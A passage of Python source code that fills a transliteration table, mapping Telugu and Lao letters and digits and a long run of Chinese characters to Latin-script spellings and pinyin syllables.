u\"డద\":\n self.trans[char] = u\"d\"\n for char in u\"ఢధ\":\n self.trans[char] = u\"dh\"\n for char in u\"ణన\":\n self.trans[char] = u\"n\"\n self.trans[u\"ప\"] = u\"p\"\n self.trans[u\"ఫ\"] = u\"ph\"\n self.trans[u\"బ\"] = u\"b\"\n self.trans[u\"భ\"] = u\"bh\"\n self.trans[u\"మ\"] = u\"m\"\n self.trans[u\"య\"] = u\"y\"\n for char in u\"రఱ\":\n self.trans[char] = u\"r\"\n for char in u\"లళ\":\n self.trans[char] = u\"l\"\n self.trans[u\"వ\"] = u\"v\"\n self.trans[u\"శ\"] = u\"sh\"\n for char in u\"షస\":\n self.trans[char] = u\"s\"\n self.trans[u\"హ\"] = u\"h\"\n self.trans[u\"్\"] = \"\"\n for char in u\"ంఁ\":\n self.trans[char] = u\"^\"\n self.trans[u\"ః\"] = u\"-\"\n self.trans[u\"౦\"] = u\"0\"\n self.trans[u\"౧\"] = u\"1\"\n self.trans[u\"౨\"] = u\"2\"\n self.trans[u\"౩\"] = u\"3\"\n self.trans[u\"౪\"] = u\"4\"\n self.trans[u\"౫\"] = u\"5\"\n self.trans[u\"౬\"] = u\"6\"\n self.trans[u\"౭\"] = u\"7\"\n self.trans[u\"౮\"] = u\"8\"\n self.trans[u\"౯\"] = u\"9\"\n self.trans[u\"౹\"] = u\"1/4\"\n self.trans[u\"౺\"] = u\"1/2\"\n self.trans[u\"౻\"] = u\"3/4\"\n self.trans[u\"౼\"] = u\"1/16\"\n self.trans[u\"౽\"] = u\"1/8\"\n self.trans[u\"౾\"] = u\"3/16\"\n # Lao - note: pronounciation in initial position is used;\n # different pronounciation in final position is ignored\n self.trans[u\"ກ\"] = \"k\"\n for char in u\"ຂຄ\":\n self.trans[char] = \"kh\"\n self.trans[u\"ງ\"] = \"ng\"\n self.trans[u\"ຈ\"] = \"ch\"\n for char in u\"ສຊ\":\n self.trans[char] = \"s\"\n self.trans[u\"ຍ\"] = \"ny\"\n self.trans[u\"ດ\"] = \"d\"\n self.trans[u\"ຕ\"] = \"t\"\n for char in u\"ຖທ\":\n self.trans[char] = \"th\"\n self.trans[u\"ນ\"] = \"n\"\n self.trans[u\"ບ\"] = \"b\"\n self.trans[u\"ປ\"] = \"p\"\n for char in u\"ຜພ\":\n self.trans[char] = \"ph\"\n for char in u\"ຝຟ\":\n self.trans[char] = \"f\"\n for char in u\"ມໝ\":\n self.trans[char] = \"m\"\n self.trans[u\"ຢ\"] = \"y\"\n for char in u\"ຣຼ\":\n self.trans[char] = \"r\"\n for char in u\"ລຼ\":\n self.trans[char] = \"l\"\n self.trans[u\"ວ\"] = \"v\"\n self.trans['ຮ'] = 'h'\n self.trans[u\"ອ\"] = \"'\"\n for char in u\"ະັ\":\n self.trans[char] = \"a\"\n self.trans[u\"ິ\"] = \"i\"\n self.trans[u\"ຶ\"] = \"ue\"\n self.trans[u\"ຸ\"] = \"u\"\n self.trans[u\"ເ\"] = u\"é\"\n self.trans[u\"ແ\"] = u\"è\"\n for char in u\"ໂົາໍ\":\n self.trans[char] = \"o\"\n self.trans[u\"ຽ\"] = \"ia\"\n self.trans[u\"ເຶ\"] = \"uea\"\n self.trans[u\"ຍ\"] = \"i\"\n for char in u\"ໄໃ\":\n self.trans[char] = \"ai\"\n self.trans[u\"ຳ\"] = \"am\"\n self.trans[u\"າ\"] = \"aa\"\n self.trans[u\"ີ\"] = \"ii\"\n self.trans[u\"ື\"] = \"yy\"\n self.trans[u\"ູ\"] = \"uu\"\n self.trans[u\"ເ\"] = \"e\"\n self.trans[u\"ແ\"] = \"ei\"\n self.trans[u\"໐\"] = \"0\"\n self.trans[u\"໑\"] = \"1\"\n self.trans[u\"໒\"] = \"2\"\n self.trans[u\"໓\"] = \"3\"\n self.trans[u\"໔\"] = \"4\"\n self.trans[u\"໕\"] = \"5\"\n self.trans[u\"໖\"] = \"6\"\n self.trans[u\"໗\"] = \"7\"\n self.trans[u\"໘\"] = \"8\"\n self.trans[u\"໙\"] = \"9\"\n # Chinese -- note: incomplete\n for char in u\"埃挨哎唉哀皑癌蔼矮艾碍爱隘\":\n self.trans[char] = u\"ai\"\n for char in u\"鞍氨安俺按暗岸胺案\":\n self.trans[char] = u\"an\"\n for char in u\"肮昂盎\":\n self.trans[char] = u\"ang\"\n for char in u\"凹敖熬翱袄傲奥懊澳\":\n self.trans[char] = u\"ao\"\n for char in u\"芭捌扒叭吧笆八疤巴拔跋靶把耙坝霸罢爸\":\n self.trans[char] = u\"ba\"\n for char in u\"白柏百摆佰败拜稗\":\n self.trans[char] = u\"bai\"\n for char in u\"斑班搬扳般颁板版扮拌伴瓣半办绊\":\n self.trans[char] = u\"ban\"\n for char in u\"邦帮梆榜膀绑棒磅蚌镑傍谤\":\n self.trans[char] = u\"bang\"\n for char in u\"苞胞包褒剥薄雹保堡饱宝抱报暴豹鲍爆\":\n self.trans[char] = u\"bao\"\n for char in u\"杯碑悲卑北辈背贝钡倍狈备惫焙被\":\n self.trans[char] = u\"bei\"\n for char in u\"奔苯本笨\":\n self.trans[char] = u\"ben\"\n for char in u\"崩绷甭泵蹦迸\":\n self.trans[char] = u\"beng\"\n for char in u\"逼鼻比鄙笔彼碧蓖蔽毕毙毖币庇痹闭敝弊必辟壁臂避陛\":\n self.trans[char] = u\"bi\"\n for char in u\"鞭边编贬扁便变卞辨辩辫遍\":\n self.trans[char] = u\"bian\"\n for char in u\"标彪膘表\":\n self.trans[char] = u\"biao\"\n for char in u\"鳖憋别瘪\":\n self.trans[char] = u\"bie\"\n for char in u\"彬斌濒滨宾摈\":\n self.trans[char] = u\"bin\"\n for char in u\"兵冰柄丙秉饼炳病并\":\n self.trans[char] = u\"bing\"\n for char in u\"玻菠播拨钵波博勃搏铂箔伯帛舶脖膊渤泊驳捕卜亳\":\n self.trans[char] = u\"bo\"\n for char in u\"哺补埠不布步簿部怖\":\n self.trans[char] = u\"bu\"\n for char in u\"猜裁材才财睬踩采彩菜蔡\":\n self.trans[char] = u\"cai\"\n for char in u\"餐参蚕残惭惨灿\":\n self.trans[char] = u\"can\"\n for char in u\"苍舱仓沧藏\":\n self.trans[char] = u\"cang\"\n for char in u\"操糙槽曹草\":\n self.trans[char] = u\"cao\"\n for char in u\"厕策侧册测\":\n self.trans[char] = u\"ce\"\n for char in u\"层蹭\":\n self.trans[char] = u\"ceng\"\n for char in u\"插叉茬茶查碴搽察岔差诧\":\n self.trans[char] = u\"cha\"\n for char in u\"拆柴豺\":\n self.trans[char] = u\"chai\"\n for char in u\"搀掺蝉馋谗缠铲产阐颤\":\n self.trans[char] = u\"chan\"\n for char in u\"昌猖场尝常长偿肠厂敞畅唱倡\":\n self.trans[char] = u\"chang\"\n for char in u\"超抄钞朝嘲潮巢吵炒\":\n self.trans[char] = u\"chao\"\n for char in u\"车扯撤掣彻澈\":\n self.trans[char] = u\"che\"\n for char in u\"郴臣辰尘晨忱沉陈趁衬\":\n self.trans[char] = u\"chen\"\n for char in u\"撑称城橙成呈乘程惩澄诚承逞骋秤\":\n self.trans[char] = u\"cheng\"\n for char in u\"吃痴持匙池迟弛驰耻齿侈尺赤翅斥炽\":\n self.trans[char] = u\"chi\"\n for char in u\"充冲虫崇宠\":\n self.trans[char] = u\"chong\"\n for char in u\"抽酬畴踌稠愁筹仇绸瞅丑臭\":\n self.trans[char] = u\"chou\"\n for char in u\"初出橱厨躇锄雏滁除楚储矗搐触处\":\n self.trans[char] = u\"chu\"\n self.trans['揣'] = 'chuai'\n for char in u\"川穿椽传船喘串\":\n self.trans[char] = u\"chuan\"\n for char in u\"疮窗幢床闯创\":\n self.trans[char] = u\"chuang\"\n for char in u\"吹炊捶锤垂\":\n self.trans[char] = u\"chui\"\n for char in u\"春椿醇唇淳纯蠢\":\n self.trans[char] = u\"chun\"\n for char in u\"戳绰\":\n self.trans[char] = u\"chuo\"\n for char in u\"疵茨磁雌辞慈瓷词此刺赐次\":\n self.trans[char] = u\"ci\"\n for char in u\"聪葱囱匆从丛\":\n self.trans[char] = u\"cong\"\n self.trans['凑'] = 'cou'\n for char in u\"粗醋簇促\":\n self.trans[char] = u\"cu\"\n for char in u\"蹿篡窜\":\n self.trans[char] = u\"cuan\"\n for char in u\"摧崔催脆瘁粹淬翠\":\n self.trans[char] = u\"cui\"\n for char in u\"村存寸\":\n self.trans[char] = u\"cun\"\n for char in u\"磋撮搓措挫错\":\n self.trans[char] = u\"cuo\"\n for char in u\"搭达答瘩打大\":\n self.trans[char] = u\"da\"\n for char in u\"呆歹傣戴带殆代贷袋待逮怠\":\n self.trans[char] = u\"dai\"\n for char in u\"耽担丹单郸掸胆旦氮但惮淡诞弹蛋儋\":\n self.trans[char] = u\"dan\"\n for char in u\"当挡党荡档\":\n self.trans[char] = u\"dang\"\n for char in u\"刀捣蹈倒岛祷导到稻悼道盗\":\n self.trans[char] = u\"dao\"\n for char in u\"德得的\":\n self.trans[char] = u\"de\"\n for char in u\"蹬灯登等瞪凳邓\":\n self.trans[char] = u\"deng\"\n for char in u\"堤低滴迪敌笛狄涤翟嫡抵底地蒂第帝弟递缔\":\n self.trans[char] = u\"di\"\n for char in u\"颠掂滇碘点典靛垫电佃甸店惦奠淀殿\":\n self.trans[char] = u\"dian\"\n for char in u\"碉叼雕凋刁掉吊钓调\":\n self.trans[char] = u\"diao\"\n for char in u\"跌爹碟蝶迭谍叠\":\n self.trans[char] = u\"die\"\n for char in u\"丁盯叮钉顶鼎锭定订\":\n self.trans[char] = u\"ding\"\n self.trans['丢'] = 'diu'\n for char in u\"东冬董懂动栋侗恫冻洞\":\n self.trans[char] = u\"dong\"\n for char in u\"兜抖斗陡豆逗痘\":\n self.trans[char] = u\"dou\"\n for char in u\"都督毒犊独读堵睹赌杜镀肚度渡妒\":\n self.trans[char] = u\"du\"\n for char in u\"端短锻段断缎\":\n self.trans[char] = u\"duan\"\n for char in u\"堆兑队对\":\n self.trans[char] = u\"dui\"\n for char in u\"墩吨蹲敦顿囤钝盾遁\":\n self.trans[char] = u\"dun\"\n for char in u\"掇哆多夺垛躲朵跺舵剁惰堕\":\n self.trans[char] = u\"duo\"\n for char in u\"蛾峨鹅俄额讹娥恶厄扼遏鄂饿\":\n self.trans[char] = u\"e\"\n for char in u\"恩嗯\":\n self.trans[char] = u\"en\"\n for char in u\"而儿耳尔饵洱二贰\":\n self.trans[char] = u\"er\"\n for char in u\"发罚筏伐乏阀法珐\":\n self.trans[char] = u\"fa\"\n for char in u\"藩帆番翻樊矾钒繁凡烦反返范贩犯饭泛\":\n self.trans[char] = u\"fan\"\n for char in u\"坊芳方肪房防妨仿访纺放\":\n self.trans[char] = u\"fang\"\n for char in u\"菲非啡飞肥匪诽吠肺废沸费\":\n self.trans[char] = u\"fei\"\n for char in u\"芬酚吩氛分纷坟焚汾粉奋份忿愤粪\":\n self.trans[char] = u\"fen\"\n for char in u\"丰封枫蜂峰锋风疯烽逢冯缝讽奉凤\":\n self.trans[char] = u\"feng\"\n self.trans['佛'] = 'fo'\n self.trans['否'] = 'fou'\n for char in u\"夫敷肤孵扶拂辐幅氟符伏俘服浮涪福袱弗甫抚辅俯釜斧脯腑府腐赴副覆赋复傅付阜父腹负富讣附妇缚咐\":\n self.trans[char] = u\"fu\"\n for char in u\"噶嘎\":\n self.trans[char] = u\"ga\"\n for char in u\"该改概钙盖溉\":\n self.trans[char] = u\"gai\"\n for char in u\"干甘杆柑竿肝赶感秆敢赣\":\n self.trans[char] = u\"gan\"\n for char in u\"冈刚钢缸肛纲岗港杠\":\n self.trans[char] = u\"gang\"\n for char in u\"篙皋高膏羔糕搞镐稿告\":\n self.trans[char] = u\"gao\"\n for char in u\"哥歌搁戈鸽胳疙割革葛格蛤阁隔铬个各\":\n self.trans[char] = u\"ge\"\n self.trans['给'] = 'gei'\n for char in u\"根跟\":\n self.trans[char] = u\"gen\"\n for char in u\"耕更庚羹埂耿梗\":\n self.trans[char] = u\"geng\"\n for char in u\"工攻功恭龚供躬公宫弓巩汞拱贡共\":\n self.trans[char] = u\"gong\"\n for char in u\"钩勾沟苟狗垢构购够\":\n self.trans[char] = u\"gou\"\n for char in u\"辜菇咕箍估沽孤姑鼓古蛊骨谷股故顾固雇\":\n self.trans[char] = u\"gu\"\n for char in u\"刮瓜剐寡挂褂\":\n self.trans[char] = u\"gua\"\n for char in u\"乖拐怪\":\n self.trans[char] = u\"guai\"\n for char in u\"棺关官冠观管馆罐惯灌贯\":\n self.trans[char] = u\"guan\"\n for char in u\"光广逛\":\n self.trans[char] = u\"guang\"\n for char in u\"瑰规圭硅归龟闺轨鬼诡癸桂柜跪贵刽\":\n self.trans[char] = u\"gui\"\n for char in u\"辊滚棍\":\n self.trans[char] = u\"gun\"\n for char in u\"锅郭国果裹过\":\n self.trans[char] = u\"guo\"\n self.trans['哈'] = 'ha'\n for char in u\"骸孩海氦亥害骇\":\n self.trans[char] = u\"hai\"\n for char in u\"酣憨邯韩含涵寒函喊罕翰撼捍旱憾悍焊汗汉\":\n self.trans[char] = u\"han\"\n for char in u\"夯杭航\":\n self.trans[char] = u\"hang\"\n for char in u\"壕嚎豪毫郝好耗号浩\":\n self.trans[char] = u\"hao\"\n for char in u\"呵喝荷菏核禾和何合盒貉阂河涸赫褐鹤贺\":\n self.trans[char] = u\"he\"\n for char in u\"嘿黑\":\n self.trans[char] = u\"hei\"\n for char in u\"痕很狠恨\":\n self.trans[char] = u\"hen\"\n for char in u\"哼亨横衡恒\":\n self.trans[char] = u\"heng\"\n for char in u\"轰哄烘虹鸿洪宏弘红\":\n self.trans[char] = u\"hong\"\n for char in u\"喉侯猴吼厚候后\":\n self.trans[char] = u\"hou\"\n for char in u\"呼乎忽瑚壶葫胡蝴狐糊湖弧虎唬护互沪户\":\n self.trans[char] = u\"hu\"\n for char in u\"花哗华猾滑画划化话\":\n self.trans[char] = u\"hua\"\n for char in u\"槐徊怀淮坏\":\n self.trans[char] = u\"huai\"\n for char in u\"欢环桓还缓换患唤痪豢焕涣宦幻\":\n self.trans[char] = u\"huan\"\n for char in u\"荒慌黄磺蝗簧皇凰惶煌晃幌恍谎\":\n self.trans[char] = u\"huang\"\n for char in u\"灰挥辉徽恢蛔回毁悔慧卉惠晦贿秽会烩汇讳诲绘\":\n self.trans[char] = u\"hui\"\n for char in u\"荤昏婚魂浑混\":\n self.trans[char] = u\"hun\"\n for char in u\"豁活伙火获或惑霍货祸\":\n self.trans[char] = u\"huo\"\n for char in u\"击圾基机畸稽积箕肌饥迹激讥鸡姬绩缉吉极棘辑籍集及急疾汲即嫉级挤几脊己蓟技冀季伎祭剂悸济寄寂计记既忌际妓继纪\":\n self.trans[char] = u\"ji\"\n for char in u\"嘉枷夹佳家加荚颊贾甲钾假稼价架驾嫁\":\n self.trans[char] = u\"jia\"\n for char in u\"歼监坚尖笺间煎兼肩艰奸缄茧检柬碱硷拣捡简俭剪减荐槛鉴践贱见键箭件健舰剑饯渐溅涧建\":\n self.trans[char] = u\"jian\"\n for char in u\"僵姜将浆江疆蒋桨奖讲匠酱降\":\n self.trans[char] = u\"jiang\"\n for char in u\"蕉椒礁焦胶交郊浇骄娇嚼搅铰矫侥脚狡角饺缴绞剿教酵轿较叫窖\":\n self.trans[char] = u\"jiao\"\n for char in u\"揭接皆秸街阶截劫节桔杰捷睫竭洁结解姐戒藉芥界借介疥诫届\":\n self.trans[char] = u\"jie\"\n for char in u\"巾筋斤金今津襟紧锦仅谨进靳晋禁近烬浸尽劲\":\n self.trans[char] = u\"jin\"\n for char in u\"荆兢茎睛晶鲸京惊精粳经井警景颈静境敬镜径痉靖竟竞净\":\n self.trans[char] = u\"jing\"\n for char in u\"囧炯窘\":\n self.trans[char] = u\"jiong\"\n for char in u\"揪究纠玖韭久灸九酒厩救旧臼舅咎就疚\":\n self.trans[char] = u\"jiu\"\n for char in u\"鞠拘狙疽居驹菊局咀矩举沮聚拒据巨具距踞锯俱句惧炬剧\":\n self.trans[char] = u\"ju\"\n for char in u\"捐鹃娟倦眷卷绢\":\n self.trans[char] = u\"juan\"\n for char in u\"撅攫抉掘倔爵觉决诀绝\":\n self.trans[char] = u\"jue\"\n for char in u\"均菌钧军君峻俊竣浚郡骏\":\n self.trans[char] = u\"jun\"\n for char in u\"喀咖卡咯\":\n self.trans[char] = u\"ka\"\n for char in u\"开揩楷凯慨\":\n self.trans[char] = u\"kai\"\n for char in u\"刊堪勘坎砍看\":\n self.trans[char] = u\"kan\"\n for char in u\"康慷糠扛抗亢炕\":\n self.trans[char] = u\"kang\"\n for char in u\"考拷烤靠\":\n self.trans[char] = u\"kao\"\n for char in u\"坷苛柯棵磕颗科壳咳可渴克刻客课\":\n self.trans[char] = u\"ke\"\n for char in u\"肯啃垦恳\":\n self.trans[char] = u\"ken\"\n for char in u\"坑吭\":\n self.trans[char] = u\"keng\"\n for char in u\"空恐孔控\":\n self.trans[char] = u\"kong\"\n for char in u\"抠口扣寇\":\n self.trans[char] = u\"kou\"\n for char in u\"枯哭窟苦酷库裤\":\n self.trans[char] = u\"ku\"\n for char in u\"夸垮挎跨胯\":\n self.trans[char] = u\"kua\"\n for char in u\"块筷侩快\":\n self.trans[char] = u\"kuai\"\n for char in u\"宽款\":\n self.trans[char] = u\"kuan\"\n for char in u\"匡筐狂框矿眶旷况\":\n self.trans[char] = u\"kuang\"\n for char in u\"亏盔岿窥葵奎魁傀馈愧溃\":\n self.trans[char] = u\"kui\"\n for char in u\"坤昆捆困\":\n self.trans[char] = u\"kun\"\n for char in u\"括扩廓阔\":\n self.trans[char] = u\"kuo\"\n for char in u\"垃拉喇蜡腊辣啦\":\n self.trans[char] = u\"la\"\n for char in u\"莱来赖\":\n self.trans[char] = u\"lai\"\n for char in u\"蓝婪栏拦篮阑兰澜谰揽览懒缆烂滥\":\n self.trans[char] = u\"lan\"\n for char in u\"琅榔狼廊郎朗浪\":\n self.trans[char] = u\"lang\"\n for char in u\"捞劳牢老佬姥酪烙涝\":\n self.trans[char] = u\"lao\"\n for char in u\"勒乐\":\n self.trans[char] = u\"le\"\n for char in u\"雷镭蕾磊累儡垒擂肋类泪\":\n self.trans[char] = u\"lei\"\n for char in u\"棱楞冷\":\n self.trans[char] = u\"leng\"\n for char in u\"厘梨犁黎篱狸离漓理李里鲤礼莉荔吏栗丽厉励砾历利傈例俐痢立粒沥隶力璃哩\":\n self.trans[char] = u\"li\"\n self.trans['俩'] = 'lia'\n for char in u\"联莲连镰廉怜涟帘敛脸链恋炼练\":\n self.trans[char] = u\"lian\"\n for char in u\"粮凉梁粱良两辆量晾亮谅\":\n self.trans[char] = u\"liang\"\n for char in u\"撩聊僚疗燎寥辽潦了撂镣廖料\":\n self.trans[char] = u\"liao\"\n for char in u\"列裂烈劣猎\":\n self.trans[char] = u\"lie\"\n for char in u\"琳林磷霖临邻鳞淋凛赁吝拎\":\n self.trans[char] = u\"lin\"\n for char in u\"玲菱零龄铃伶羚凌灵陵岭领另令\":\n self.trans[char] = u\"ling\"\n for char in u\"溜琉榴硫馏留刘瘤流柳六\":\n self.trans[char] = u\"liu\"\n for char in u\"龙聋咙笼窿隆垄拢陇\":\n self.trans[char] = u\"long\"\n for char in u\"楼娄搂篓漏陋\":\n self.trans[char] = u\"lou\"\n for char in u\"芦卢颅庐炉掳卤虏鲁麓碌露路赂鹿潞禄录陆戮泸\":\n self.trans[char] = u\"lu\"\n for char in u\"峦挛孪滦卵乱\":\n self.trans[char] = u\"luan\"\n for char in u\"掠略\":\n self.trans[char] = u\"lue\"\n for char in u\"抡轮伦仑沦纶论\":\n self.trans[char] = u\"lun\"\n for char in u\"萝螺罗逻锣箩骡裸落洛骆络漯\":\n self.trans[char] = u\"luo\"\n for char in u\"驴吕铝侣旅履屡缕虑氯律率滤绿\":\n self.trans[char] = u\"lv\"\n for char in u\"妈麻玛码蚂马骂嘛吗\":\n self.trans[char] = u\"ma\"\n for char in u\"埋买麦卖迈脉\":\n self.trans[char] = u\"mai\"\n for char in u\"瞒馒蛮满蔓曼慢漫谩\":\n self.trans[char] = u\"man\"\n for char in u\"芒茫盲氓忙莽\":\n self.trans[char] = u\"mang\"\n for char in u\"猫茅锚毛矛铆卯茂冒帽貌贸\":\n self.trans[char] = u\"mao\"\n self.trans['么'] = 'me'\n for char in u\"玫枚梅酶霉煤没眉媒镁每美昧寐妹媚\":\n self.trans[char] = u\"mei\"\n for char in u\"门闷们\":\n self.trans[char] = u\"men\"\n for char in u\"萌蒙檬盟锰猛梦孟\":\n self.trans[char] = u\"meng\"\n for char in u\"眯醚靡糜迷谜弥米秘觅泌蜜密幂\":\n self.trans[char] = u\"mi\"\n for char in u\"棉眠绵冕免勉娩缅面\":\n self.trans[char] = u\"mian\"\n for char in u\"苗描瞄藐秒渺庙妙\":\n self.trans[char] = u\"miao\"\n for char in u\"蔑灭\":\n self.trans[char] = u\"mie\"\n for char in u\"民抿皿敏悯闽\":\n self.trans[char] = u\"min\"\n for char in u\"明螟鸣铭名命\":\n self.trans[char] = u\"ming\"\n self.trans['谬'] = 'miu'\n for char in u\"摸摹蘑模膜磨摩魔抹末莫墨默沫漠寞陌\":\n self.trans[char] = u\"mo\"\n for char in u\"谋牟某\":\n self.trans[char] = u\"mou\"\n for char in u\"拇牡亩姆母墓暮幕募慕木目睦牧穆\":\n self.trans[char] = u\"mu\"\n for char in u\"拿哪呐钠那娜纳\":\n self.trans[char] = u\"na\"\n for char in u\"氖乃奶耐奈\":\n self.trans[char] = u\"nai\"\n for char in u\"南男难\":\n self.trans[char] = u\"nan\"\n self.trans['囊'] = 'nang'\n for char in u\"挠脑恼闹淖\":\n self.trans[char] = u\"nao\"\n self.trans['呢'] = 'ne'\n for char in u\"馁内\":\n self.trans[char] = u\"nei\"\n self.trans['嫩'] = 'nen'\n self.trans['能'] = 'neng'\n for char in u\"妮霓倪泥尼拟你匿腻逆溺\":\n self.trans[char] = u\"ni\"\n for char in u\"蔫拈年碾撵捻念\":\n self.trans[char] = u\"nian\"\n for char in u\"娘酿\":\n self.trans[char] = u\"niang\"\n for char in u\"鸟尿\":\n self.trans[char] = u\"niao\"\n for char in u\"捏聂孽啮镊镍涅\":\n self.trans[char] = u\"nie\"\n self.trans['您'] = 'nin'\n for char in u\"柠狞凝宁拧泞\":\n self.trans[char] = u\"ning\"\n for char in u\"牛扭钮纽\":\n self.trans[char] = u\"niu\"\n for char in u\"脓浓农弄\":\n self.trans[char] = u\"nong\"\n for char in u\"奴努怒\":\n self.trans[char] = u\"nu\"\n self.trans['暖'] = 'nuan'\n for char in u\"虐疟\":\n self.trans[char] = u\"nue\"\n for char in u\"挪懦糯诺\":\n self.trans[char] = u\"nuo\"\n self.trans['女'] = 'nv'\n self.trans['哦'] = 'o'\n for char in u\"欧鸥殴藕呕偶沤\":\n self.trans[char] = u\"ou\"\n for char in u\"啪趴爬帕怕琶\":\n self.trans[char] = u\"pa\"\n for char in u\"拍排牌徘湃派\":\n self.trans[char] = u\"pai\"\n for char in u\"攀潘盘磐盼畔判叛\":\n self.trans[char] = u\"pan\"\n for char in u\"乓庞旁耪胖\":\n self.trans[char] = u\"pang\"\n for char in u\"抛咆刨炮袍跑泡\":\n self.trans[char] = u\"pao\"\n for char in u\"呸胚培裴赔陪配佩沛\":\n self.trans[char] = u\"pei\"\n for char in u\"喷盆\":\n self.trans[char] = u\"pen\"\n for char in u\"砰抨烹澎彭蓬棚硼篷膨朋鹏捧碰\":\n self.trans[char] = u\"peng\"\n for char in u\"坯砒霹批披劈琵毗啤脾疲皮匹痞僻屁譬\":\n self.trans[char] = u\"pi\"\n for char in u\"篇偏片骗\":\n self.trans[char] = u\"pian\"\n for char in u\"飘漂瓢票\":\n self.trans[char] = u\"piao\"\n for char in u\"撇瞥\":\n self.trans[char] = u\"pie\"\n for char in u\"拼频贫品聘\":\n self.trans[char] = u\"pin\"\n for char in u\"乒坪苹萍平凭瓶评屏\":\n self.trans[char] = u\"ping\"\n for char in u\"坡泼颇婆破魄迫粕剖\":\n self.trans[char] = u\"po\"\n for char in u\"扑铺仆莆葡菩蒲埔朴圃普浦谱曝瀑濮\":\n self.trans[char] = u\"pu\"\n for char in u\"期欺栖戚妻七凄漆柒沏其棋奇歧畦崎脐齐旗祈祁骑起岂乞企启契砌器气迄弃汽泣讫\":\n self.trans[char] = u\"qi\"\n for char in u\"掐恰洽\":\n self.trans[char] = u\"qia\"\n for char in u\"牵扦钎铅千迁签仟谦乾黔钱钳前潜遣浅谴堑嵌欠歉\":\n self.trans[char] = u\"qian\"\n for char in u\"枪呛腔羌墙蔷强抢\":\n self.trans[char] = u\"qiang\"\n for char in u\"橇锹敲悄桥瞧乔侨巧鞘撬翘峭俏窍\":\n self.trans[char] = u\"qiao\"\n for char in u\"切茄且怯窃\":\n self.trans[char] = u\"qie\"\n for char in u\"钦侵亲秦琴勤芹擒禽寝沁\":\n self.trans[char] = u\"qin\"\n for char in u\"青轻氢倾卿清擎晴氰情顷请庆\":\n self.trans[char] = u\"qing\"\n for char in u\"琼穷\":\n self.trans[char] = u\"qiong\"\n for char in u\"秋丘邱球求囚酋泅\":\n self.trans[char] = u\"qiu\"\n for char in u\"趋区蛆曲躯屈驱渠取娶龋趣去\":\n self.trans[char] = u\"qu\"\n for char in u\"圈颧权醛泉全痊拳犬券劝\":\n self.trans[char] = u\"quan\"\n for char in u\"缺炔瘸却鹊榷确雀\":\n self.trans[char] = u\"que\"\n for char in u\"裙群\":\n self.trans[char] = u\"qun\"\n for char in u\"然燃冉染\":\n self.trans[char] = u\"ran\"\n for char in u\"瓤壤攘嚷让\":\n self.trans[char] = u\"rang\"\n for char in u\"饶扰绕\":\n self.trans[char] = u\"rao\"\n for char in u\"惹热\":\n self.trans[char] = u\"re\"\n for char in u\"壬仁人忍韧任认刃妊纫\":\n self.trans[char] = u\"ren\"\n for char in u\"扔仍\":\n self.trans[char] = u\"reng\"\n self.trans['日'] = 'ri'\n for char in u\"戎茸蓉荣融熔溶容绒冗\":\n self.trans[char] = u\"rong\"\n for char in u\"揉柔肉\":\n self.trans[char] = u\"rou\"\n for char in u\"茹蠕儒孺如辱乳汝入褥\":\n self.trans[char] = u\"ru\"\n for char in u\"软阮\":\n self.trans[char] = u\"ruan\"\n for char in u\"蕊瑞锐\":\n self.trans[char] = u\"rui\"\n for char in u\"闰润\":\n self.trans[char] = u\"run\"\n for char in u\"若弱\":\n self.trans[char] = u\"ruo\"\n for char in u\"撒洒萨\":\n self.trans[char] = u\"sa\"\n for char in u\"腮鳃塞赛\":\n self.trans[char] = u\"sai\"\n for char in u\"三叁伞散\":\n self.trans[char] = u\"san\"\n for char in u\"桑嗓丧\":\n self.trans[char] = u\"sang\"\n for char in u\"搔骚扫嫂\":\n self.trans[char] = u\"sao\"\n for char in u\"瑟色涩\":\n self.trans[char] = u\"se\"\n self.trans['森'] = 'sen'\n self.trans['僧'] = 'seng'\n for char in u\"莎砂杀刹沙纱傻啥煞\":\n self.trans[char] = u\"sha\"\n for char in u\"筛晒\":\n self.trans[char] = u\"shai\"\n for char in u\"珊苫杉山删煽衫闪陕擅赡膳善汕扇缮\":\n self.trans[char] = u\"shan\"\n for char in u\"墒伤商赏晌上尚裳\":\n self.trans[char] = u\"shang\"\n for char in u\"梢捎稍烧芍勺韶少哨邵绍\":\n self.trans[char] = u\"shao\"\n for char in u\"奢赊蛇舌舍赦摄射慑涉社设\":\n self.trans[char] = u\"she\"\n for char in u\"砷申呻伸身深娠绅神沈审婶甚肾慎渗\":\n self.trans[char] = u\"shen\"\n for char in u\"声生甥牲升绳省盛剩胜圣\":\n self.trans[char] = u\"sheng\"\n for char in u\"师失狮施湿诗尸虱十石拾时什食蚀实识史矢使屎驶始式示士世柿事拭誓逝势是嗜噬适仕侍释饰氏市恃室视试\":\n self.trans[char] = u\"shi\"\n for char in u\"收手首守寿授售受瘦兽\":\n self.trans[char] = u\"shou\"\n for char in u\"蔬枢梳殊抒输叔舒淑疏书赎孰熟薯暑曙署蜀黍鼠属术述树束戍竖墅庶数漱恕\":\n self.trans[char] = u\"shu\"\n for char in u\"刷耍\":\n self.trans[char] = u\"shua\"\n for char in u\"摔衰甩帅\":\n self.trans[char] = u\"shuai\"\n for char in u\"栓拴\":\n self.trans[char] = u\"shuan\"\n for char in u\"霜双爽\":\n self.trans[char] = u\"shuang\"\n for char in u\"谁水睡税\":\n self.trans[char] = u\"shui\"\n for char in u\"吮瞬顺舜\":\n self.trans[char] = u\"shun\"\n for char in u\"说硕朔烁\":\n self.trans[char] = u\"shuo\"\n for char in u\"斯撕嘶思私司丝死肆寺嗣四伺似饲巳\":\n self.trans[char] = u\"si\"\n for char in u\"松耸怂颂送宋讼诵\":\n self.trans[char] = u\"song\"\n for char in u\"搜艘擞\":\n self.trans[char] = u\"sou\"\n for char in u\"嗽苏酥俗素速粟僳塑溯宿诉肃\":\n self.trans[char] = u\"su\"\n for char in u\"酸蒜算\":\n self.trans[char] = u\"suan\"\n for char in u\"虽隋随绥髓碎岁穗遂隧祟\":\n self.trans[char] = u\"sui\"\n for char in u\"孙损笋\":\n self.trans[char] = u\"sun\"\n for char in u\"蓑梭唆缩琐索锁所\":\n self.trans[char] = u\"suo\"\n for char in u\"塌他它她塔獭挞蹋踏\":\n self.trans[char] = u\"ta\"\n for char in u\"胎苔抬台泰酞太态汰\":\n self.trans[char] = u\"tai\"\n for char in u\"坍摊贪瘫滩坛檀痰潭谭谈坦毯袒碳探叹炭\":\n self.trans[char] = u\"tan\"\n for char in u\"汤塘搪堂棠膛唐糖倘躺淌趟烫\":\n self.trans[char] = u\"tang\"\n for char in u\"掏涛滔绦萄桃逃淘陶讨套\":\n self.trans[char] = u\"tao\"\n self.trans['特'] = 'te'\n for char in u\"藤腾疼誊\":\n 